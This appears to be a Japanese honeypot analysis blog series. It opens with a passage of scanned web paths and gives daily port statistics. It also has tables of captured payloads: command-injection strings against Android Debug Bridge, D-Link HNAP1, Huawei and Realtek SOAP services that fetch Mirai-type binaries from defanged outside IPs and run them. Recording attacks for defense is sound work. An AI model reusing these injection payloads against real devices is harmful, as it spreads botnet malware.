9月6日 | GET | /qidai/index.jsp |
9月6日 | GET | /qjhq/index.jsp |
9月6日 | GET | /rf/index.jsp |
9月6日 | GET | /rrr/index.jsp |
9月6日 | GET | /rte/index.jsp |
9月6日 | GET | /safe/index.jsp |
9月6日 | GET | /safe2/index.jsp |
9月6日 | GET | /safee/index.jsp |
9月6日 | GET | /safepp/index.jsp |
9月6日 | GET | /scripts/setup.php |
9月6日 | GET | /servletc-eavmple/index.jsp |
9月6日 | GET | /shell.php |
9月6日 | GET | /shijian/index.jsp |
9月6日 | GET | /shl/index.jsp |
9月6日 | GET | /soft/index.jsp |
9月6日 | GET | /supsz/index.jsp |
9月6日 | GET | /synsuper/index.jsp |
9月6日 | GET | /synsupesssssssssssssssr/index.jsp |
9月6日 | GET | /sysadmin/index.jsp |
9月6日 | GET | /system/index.jsp |
9月6日 | GET | /system2/index.jsp |
9月6日 | GET | /systems/index.jsp |
9月6日 | GET | /tao/index.jsp |
9月6日 | GET | /taoge/index.jsp |
9月6日 | GET | /temps/index.jsp |
9月6日 | GET | /test.php |
9月6日 | GET | /text.php |
9月6日 | GET | /tomcat-5.5.26/index.jsp |
9月6日 | GET | /tools/phpMyAdmin/index.php |
9月6日 | GET | /typo3/phpmyadmin/index.php |
9月6日 | GET | /uploader.php |
9月6日 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) |
9月6日 | GET | /wangbaba110/index.jsp |
9月6日 | GET | /wavce/index.jsp |
9月6日 | GET | /web/phpMyAdmin/index.php |
9月6日 | GET | /webd/index.jsp |
9月6日 | GET | /webdav/ |
9月6日 | GET | /webdax/index.jsp |
9月6日 | GET | /webdoc/index.jsp |
9月6日 | GET | /webex/index.jsp |
9月6日 | GET | /webshell/index.jsp |
9月6日 | GET | /wholove/index.jsp |
9月6日 | GET | /win/index.jsp |
9月6日 | GET | /win88/index.jsp |
9月6日 | GET | /wo/index.jsp |
9月6日 | GET | /wp-config.php |
9月6日 | GET | /wpo.php |
9月6日 | GET | /ww/index.jsp |
9月6日 | GET | /www/phpMyAdmin/index.php |
9月6日 | GET | /x.php |
9月6日 | GET | /xampp/phpmyadmin/index.php |
9月6日 | GET | /xhzz/index.jsp |
9月6日 | GET | /xiaodama/index.jsp |
9月6日 | GET | /xiaohui/index.jsp |
9月6日 | GET | /xiaomo/index.jsp |
9月6日 | GET | /xiaon/index.jsp |
9月6日 | GET | /xiaowu/index.jsp |
9月6日 | GET | /xiaozhe/index.jsp |
9月6日 | GET | /xinsui/index.jsp |
9月6日 | GET | /z.php |
9月6日 | GET | /zhu/index.jsp |
9月6日 | GET | /zman/index.jsp |
9月6日 | GET | /zxc/index.jsp |
9月6日 | GET | @research.aegis.network/ |
9月6日 | HEAD | hxxp://180.163.113[.]82/check_proxy |
9月6日 | OPTIONS | * |
9月6日 | POST | /12.php |
9月6日 | POST | /1213.php |
9月6日 | POST | /3.php |
9月6日 | POST | /56.php |
9月6日 | POST | /9510.php |
9月6日 | POST | /9678.php |
9月6日 | POST | /aaaa.php |
9月6日 | POST | /ak.php |
9月6日 | POST | /ak47.php |
9月6日 | POST | /ak48.php |
9月6日 | POST | /angge.php |
9月6日 | POST | /aotu.php |
9月6日 | POST | /app.php |
9月6日 | POST | /aw.php |
9月6日 | POST | /bak.php |
9月6日 | POST | /boots.php |
9月6日 | POST | /cainiao.php |
9月6日 | POST | /ceshi.php |
9月6日 | POST | /cmd.php |
9月6日 | POST | /conflg.php |
9月6日 | POST | /data.php |
9月6日 | POST | /db.init.php |
9月6日 | POST | /db__.init.php |
9月6日 | POST | /db_dataml.php |
9月6日 | POST | /db_desql.php |
9月6日 | POST | /db_session.init.php |
9月6日 | POST | /default.php |
9月6日 | POST | /defect.php |
9月6日 | POST | /fack.php |
9月6日 | POST | /feixiang.php |
9月6日 | POST | /h1.php |
9月6日 | POST | /help.php |
9月6日 | POST | /hh.php |
9月6日 | POST | /hm.php |
9月6日 | POST | /infoo.php |
9月6日 | POST | /ip.php |
9月6日 | POST | /l6.php |
9月6日 | POST | /l7.php |
9月6日 | POST | /l8.php |
9月6日 | POST | /lindex.php |
9月6日 | POST | /linuxse.php |
9月6日 | POST | /log.php |
9月6日 | POST | /m.php?pbid=open |
9月6日 | POST | /miao.php |
9月6日 | POST | /min.php |
9月6日 | POST | /mx.php |
9月6日 | POST | /mz.php |
9月6日 | POST | /pe.php |
9月6日 | POST | /phpStudy.php |
9月6日 | POST | /phpinfi.php |
9月6日 | POST | /post.php |
9月6日 | POST | /python.php |
9月6日 | POST | /q.php |
9月6日 | POST | /qaq.php |
9月6日 | POST | /qq.php |
9月6日 | POST | /qwe.php |
9月6日 | POST | /s.php |
9月6日 | POST | /sean.php |
9月6日 | POST | /she.php |
9月6日 | POST | /sheep.php |
9月6日 | POST | /ssaa.php |
9月6日 | POST | /system.php |
9月6日 | POST | /test.php |
9月6日 | POST | /tiandi.php |
9月6日 | POST | /w.php |
9月6日 | POST | /wan.php |
9月6日 | POST | /wanan.php |
9月6日 | POST | /wc.php |
9月6日 | POST | /webslee.php |
9月6日 | POST | /weixiao.php |
9月6日 | POST | /wp-admins.php |
9月6日 | POST | /wshell.php |
9月6日 | POST | /wuwu11.php |
9月6日 | POST | /xiao.php |
9月6日 | POST | /xiaoma.php |
9月6日 | POST | /xiaomae.php |
9月6日 | POST | /xiaomar.php |
9月6日 | POST | /xshell.php |
9月6日 | POST | /xw.php |
9月6日 | POST | /xw1.php |
9月6日 | POST | /xx.php |
9月6日 | POST | /xz.php |
9月6日 | POST | /yao.php |
9月6日 | POST | /yumo.php |
9月6日 | POST | /zshmindex.php |
9月6日 | POST | /zuo.php |
9月6日 | POST | /zuoindex.php |
9月6日 | POST | /zuoshou.php |
9月6日 | PROPFIND | / |
以上、簡易分析でした。
ハニーポット簡易分析(25日目:9/2)
9/2 分のハニーポット簡易分析となります。今回、Splunkのサーチ文を工夫したため、分析に必要なデータ収集が約半分程度で終わりました。分析方法についてはどこかで書きたいなーと思っています。
Honeytrap
検知数:3,359件
<宛先ポート別 TOP10>
ポート | 件数 | 割合 | サービス |
445 | 1,657 | 49.33% | SMB |
3389 | 74 | 2.20% | RDP |
52869 | 70 | 2.08% | D-Link, Realtek SDK |
22 | 65 | 1.94% | SSH |
1911 | 63 | 1.88% | Arctic |
81 | 47 | 1.40% | ? |
1433 | 46 | 1.37% | Microsoft SQL Server |
3350 | 44 | 1.31% | ? |
53 | 32 | 0.95% | DNS |
8080 | 32 | 0.95% | PROXY |
<マルウェアダウンロード>
マルウェアはいつも通り、Mirai関連でした。なかなか、他のマルウェアは出てきませんが、のんびりと待ちたいと思います。
以上、簡易分析でした。
ハニーポット簡易分析(24日目:9/1)
本来であれば、8/30,8/31の分析を行うはずでしたが、こちらの手違いでデータをロストしてしまいましたorz
今回は9/1分の分析となります。
9/1 Honeytrap 3422件(データ部 0byte以上)
ポート | 件数 | 割合 | サービス |
445 | 1,813 | 52.98% | SMB |
22 | 118 | 3.45% | SSH |
3389 | 84 | 2.46% | RDP |
1433 | 77 | 2.25% | Microsoft SQL Server |
502 | 61 | 1.78% | Modbus Protocol |
52869 | 58 | 1.70% | D-Link, Realtek SDK |
8080 | 47 | 1.37% | PROXY |
5986 | 34 | 0.99% | Windows PowerShell Default psSession Port |
81 | 32 | 0.94% |
goahead |
64738 | 32 | 0.94% | Mumble VoIP server |
マルウェアダウンロード関連
宛先ポート | 対象 | パス | ペイロード |
5555 | Android Debug Bridge | CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN[.][.][.][.][.][.][.][.]Ý[.][.][.]&A[.][.]°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.] →VirusTotal |
|
CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN)[.][.][.][.][.][.][.][.][.][.][.]O/[.][.]°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.] →VirusTotal |
|||
8080 | JBOSS | GET /jbossass/jbossass.jsp | GET /jbossass/jbossass[.]jsp?ppp=wget+hxxp%3A%2F%2F49[.]123[.]1[.]37%2Fctbuzs%2Fstdpic%2F2015%2F02%2Fdevice%2Fjboss%2Fplaintext[.]txt HTTP/1[.]1 User-Agent: jexboss →VirusTotal |
D-Link DSL-2750B | GET /login.cgi | wget%20hxxp://148[.]72[.]176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ User-Agent: Hakai/2[.]0 →VirusTotal |
|
808 | D-Link 社のルータ (CVE-2015-2051) |
POST /HNAP1/ | SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148[.]72[.]176[.]78/ngynx && sh ngynx` →VirusTotal |
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mips && chmod 777 /tmp/kenjiro[.]mips/ && /tmp/kenjiro[.]mips` →VirusTotal |
|||
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://77[.]87[.]77[.]250/izuku[.]mips && chmod +x izuku[.]mips; [.]/izuku[.]mips` →VirusTotal |
|||
37215 | Huawei社のルータ | POST /ctrlt/DeviceUpgrade_1 | <NewStatusURL>$(busybox wget -g 142[.]93[.]245[.]252 -l /tmp/aa1 -r /gaybub/miori[.]mips;busybox chmod +x /tmp/aa1 ;/tmp/aa1 huawei)</NewStatusURL> →VirusTotal |
52869 | Realtek SDK miniigd SOAP | POST /picdesc.xml | <NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient> →VirusTotal |
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/rr`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://159[.]65[.]232[.]56/xd[.]mips`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/miori[.]mips`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://107[.]191[.]99[.]41/elf[.]mips -O elf`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://46[.]101[.]250[.]21/8mips8[.]mips -O 8mips8`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/; wget hxxp://76[.]74[.]170[.]223/shit[.]mips -O k`</NewInternalClient> →VirusTotal |
大きな傾向の変化は特にありませんでした。
分析する上で、手動で行なっている部分が非常に多いため、自動化で分析に時間がかけられるようにしたいと思っています。また、IDSのsuricataも導入したものの、うまく使えていないのが現状となっています。
今月は自動化とIDSのチューニングに力を入れて、頑張っていきます。
ハニーポット簡易分析(21,22日目:8/28,8/29)
遅れましたが、Honeypotの簡易分析 8/28,8/29分の更新となります。
8/28
Honeytrap 3,418 件 (データ部 0byte以上)
※80ポートは除く
ポート | 件数 | 割合 | サービス |
445 | 1,954 | 57.17% | SMB |
3389 | 69 | 2.02% | RDP |
1433 | 62 | 1.81% | Microsoft SQL Server |
3128 | 52 | 1.52% | ? |
8080 | 46 | 1.35% | PROXY |
52869 | 45 | 1.32% | D-Link, Realtek SDK |
81 | 37 | 1.08% | ? |
8443 | 35 | 1.02% | ? |
5555 | 32 | 0.94% | Android Debug Bridge |
4500 | 32 | 0.94% | IPSec NAT Traversal |
8/29
Honeytrap 3,600 件 (データ部 0byte以上)
※80ポートは除く
ポート | 件数 | 割合 | サービス |
445 | 2,057 | 57.14% | SMB |
3389 | 151 | 4.19% | RDP |
8080 | 70 | 1.94% | PROXY |
1433 | 68 | 1.89% | Microsoft SQL Server |
9600 | 62 | 1.72% | ? |
52869 | 46 | 1.28% | D-Link, Realtek SDK |
5555 | 37 | 1.03% | Android Debug Bridge |
1471 | 32 | 0.89% | ? |
81 | 24 | 0.67% | ? |
22 | 22 | 0.61% | SSH |
<マルウェアダウンロード>
宛先ポート | リクエスト | ダウンロード | 脆弱性 |
5555 | wget hxxp://207[.]148[.]78[.]152/br VirusTotal |
Android Debug Bridge に対する攻撃 | |
wget hxxp://185[.]162[.]130[.]187/adbs VirusTotal |
|||
wget hxxp://27[.]102[.]115[.]44/adbs VirusTotal |
|||
8081 | POST /HNAP1/ | wget hxxp://148[.]72[.]176[.]78/ngynx VirusTotal |
D-Link 社のルータへの攻撃(CVE-2015-2051) |
wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mip VirusTotal |
|||
wget hxxp://148[.]72[.]176[.]78/ken[.]sh | |||
37215 | POST /ctrlt/DeviceUpgrade_1 | wget -g 209[.]141[.]33[.]86 VirusTotal |
Huawei社のルータを狙った攻撃 |
wget -g 31[.]220[.]43[.]190 | |||
52869 | POST /picdesc[.]xml | wget hxxp://185[.]10[.]68[.]127/rtbin | Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃 |
wget hxxp://80[.]211[.]112[.]150/mips | |||
wget hxxp://80[.]211[.]137[.]127/ntpd | |||
wget hxxp://159[.]65[.]232[.]56/xd[.]mips | |||
wget hxxp://80[.]211[.]55[.]29/SSG/mips[.]SSG | |||
wget hxxp://107[.]191[.]99[.]41/elf[.]mips | |||
wget hxxp://167[.]99[.]228[.]78/8mips8[.]mips | |||
wget hxxp://167[.]99[.]228[.]78/8mips8[.]mip | |||
wget hxxp://185[.]10[.]68[.]127/rtbin VirusTotal |
他のハニーポッターの話を聞いてみると、やはりMirai関連のマルウェアが多くを占めています。まだまだ、継続して検知しそうです。
以上、簡易分析でした。